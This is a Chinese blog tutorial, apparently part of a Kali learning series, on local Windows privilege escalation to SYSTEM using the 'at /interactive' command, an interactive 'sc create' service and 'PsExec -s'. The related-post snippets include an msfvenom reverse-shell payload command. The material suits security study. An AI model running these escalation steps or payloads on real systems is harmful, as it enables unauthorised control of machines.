【kali】27 提权——本地提权

最新推荐文章于 2024-04-23 10:15:07 发布
最新推荐文章于 2024-04-23 10:15:07 发布
阅读量830 收藏
点赞数 1
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/grb819/article/details/120910837
版权

这里写自定义目录标题

windows:

  • user
  • administrator
  • system ——内核
    在这里插入图片描述

Linux:

  • user
  • root

Windows系统提权

1. 使用at提权

XP
Windows server 2003

修改密码

net user

查看系统用户

net user xxx *

在这里插入图片描述

查看用户状态

net user xxx

在这里插入图片描述 在这里插入图片描述

查看用户进程

有很多system创建的服务进程

在这里插入图片描述

将user权限提升为system

cd \
at -?
at 18:58 /interactive cmd  #必须是未来时间,否则将是明天时间

在这里插入图片描述 在这里插入图片描述

关闭explorer

结果:桌面不可操作

在这里插入图片描述 在这里插入图片描述

创建explorer

发现权限变成system

在这里插入图片描述 在这里插入图片描述

2. 使用 sc 提权 (适用于 Win7 及Windows server 2008 等高级版本)

创建一个服务
默认是不启动的,可以去图形化界面自己启动

cd
sc Create syscmd binPath= “cmd /K start” type= own type= interact
sc start syscmd

3. 使用工具提权- Sysinternals Suite 套件

载之后解压使用其中的 PsExec 放在C盘根目录
在这里插入图片描述

  C:\>PsExec.exe
  -i: 交互模式
  -s: 使用系统账户

  C:\>psexec -i -s -d taskmgr
  C:\>PsExec.exe -i -s cmd
(∪.∪ )...zzz
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali渗透基础》10. 、后渗透
学习学习学习......
07-23 799
、Admin 为 System、抓包嗅探、键盘记录、本地缓存密码(PwDump,WCE,fgdump,Mimikatz)、利用漏洞、利用配置不当(icacls,find)、信息与数据收集、痕迹隐藏。
Kali Linux渗透测试之(一)——本地
qq_29864185的博客
07-08 2786
目录 本地 Windows系统用户限划分 Linux系统用户限划分 1. Windows系统下进行 (1)查看当前用户的信息;(前:进行的用户是administrator限) (2)——Psexec (3)——At (4)使所有cmd命令行窗口都是以system限打开 (6)注入进程,隐蔽痕迹——Pinjecter 2. Linux系统下进行 本地 目前系统都是多用户操作系统,可以登录多个账户,实现限的隔离,针对不同的应用,对应不同的账户
Kalikali主要工具使用说明(文末附超全思维导图)
最新发布
jennycisp的博客
04-23 1621
changeme -a 目标探测目标是否使用默认密码(新版本中已移除该工具)强大之处在于供了大量的渗透测试模块和插件。7种类型,Exploits(渗透攻击模块)、Auxiliary(辅助模块)、Post(后渗透攻击模块)、Payloads(攻击载荷模块)、Encoders(编码器模块)、Nops(空指令模块)、Evasion(规避模块)。
kali】29 —— 利用漏洞
(∪.∪ )...zzz的博客
11-27 7955
这里写自定义目录标题一、使用 Ms011-080 获取 WinXP 的 SYSTEM 限1. Ms011-080 对应补丁 Kb25927992. kali集成了exploit3. 查看.py4. 生成.exe5. 运行exe成功二、Win7 使用 Ms14-068 获取 域控制器的限1.win2003搭建域控制器2. 修改win2003域控制器的用户限三、利用 CVE-2012-0056 升 linux 限 一、使用 Ms011-080 获取 WinXP 的 SYSTEM 限 1. Ms0
【内网安全】——Linux姿势
Demo不是emo的博客
02-08 5485
Linux姿势汇总
Kali将用户限永久升为root
ianTok
10-02 4738
Kali
metasploit下Windows的多种方法
02-25
目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且限不是系统限的前下,使用以下列出的几种方法:本方法主要有以下3个模块。上面这些模块的详细信息在metasploit里已有介绍,这里不再...
Linux使用suid vim.basic文件实现
09-14
然而,SUID限也可能被恶意利用,例如在攻击中。本篇文章将重点讨论如何通过SUID的`vim.basic`文件来实现。 首先,我们要确保有一个SUID限的`vim.basic`文件。在Kali Linux系统中,我们可以使用`chmod`...
无net添加用户
09-13
在IT安全领域,""是指通过某种方式获取系统中更高的限,通常是指从普通用户升到管理员限。这种行为在恶意攻击者中被用来扩大对目标系统的控制,而在合法管理员中则是为了进行系统维护或修复。"无net...
linux教程
02-10
了解原理后,可以通过虚拟机环境实践各种技术,如Metasploit框架中的exploit模块,或使用Kali Linux等渗透测试发行版进行模拟攻击。 六、学习资源 1. Linux限与文件系统管理:学习如何正确配置文件和目录...
kali-升】(4.1)假冒令牌攻击、本地:流程
08-07 1128
kali-升】假冒令牌攻击、本地
Kali 2020.1 普通账户获取root限(超详细的喔~带视频的那种喔~)
提笔忘字的帝国
08-29 8522
为普通账户获得root限,最详细的步骤,文章还有视频教程链接!!!
kali的基础linux命令
SHI_GUANG123的博客
10-17 1740
命令执行结果中,每个部分是一个网卡,此处我这里有两个网卡:eth0 和 lo 在kali中,网卡的命名格式:ethX,第一个网卡的名字是eth0,第二个网卡eth1,第三个网卡 eth2....安装kalil的过程中,并未设置root的密码,而是创建了一个普通用户,并且未普通用户设置了一个密 码。注意:如果打开后,发现是空白的,则说明文件路径错误,或者文件名错误。vi后面的文件如果是存在的,那么这个文件就被打开了。vi后面的文件如果是不存在的,那么就会创建这个文件。在写文件路径的时候,最好从根目录开始写。
kali下msf
失心少年
09-23 4738
生成木马 Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe 配置监听程序 Msfconsole 打开Metaploit msf > use exploit/multi/handler s...
kali-升】(4.2.4)社会工程学工具包:远控木马使用、设置、利用
08-08 1336
【社会工程学工具包】远控木马全过程
Kali Linux渗透测试之(二)——Fgdump、Mimikatz、WCE
weixin_45116657的博客
08-18 2373
1、Windows身份认证的过程 在登录窗口输入账号和密码后,winlogon.exe会将输入的密码进行lmhash和nthash加密; 然后将加密后的密码与SAM账户数据库进行比对,如果比对匹配,则成功登录操作系统(本地登录); 如果网络中的一台主机尝试远程登录另一台主机,登录的账号和密码也是通过本地计算机将输入的密码进行lmhash和nthash计算,然后将加密后的密文通过网络传输到目标主...
Kali实战-
小水池
05-28 4570
本地 windows默认账号 user Administrator System #最高限 关系图示: Linux默认账号 User Root ADMIN为SYSTEM 思路:利用windows中以system运行的程序进行操作,将系统 win xp、win2003 at 18:12(时间) /interactive cmd ...
小白日记21:kali渗透测试之(一)--本地
ZiXuanFY的博客
09-23 5884
本地 简单地说,本地漏洞就是说一个本来非常低限、受限制的用户,可以升到系统至高无上的限。升漏洞通常是一种“辅助”性质的漏洞,当黑客已经通过某种手段进入了目标机器后,可以利用他进入更高的状态。但并不是说这种漏洞不严重、难以利用,往往这种漏洞更容易被利用、带来的后果比远程漏洞更可怕,这种漏洞实际上远比远程漏洞稀有,往往一个微软本地漏洞在国外的价格就可以到几百万美金。因为远程漏
Kali Linux渗透技巧全集:实战与进阶指南
标题:"Kali Linux学习:渗透与技巧总结大全" Kali Linux 是一个专门为安全测试和渗透研究设计的操作系统,以其丰富的工具集和广泛的渗透测试功能而闻名。本文旨在分享关于Kali Linux的学习经验和实用技巧,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值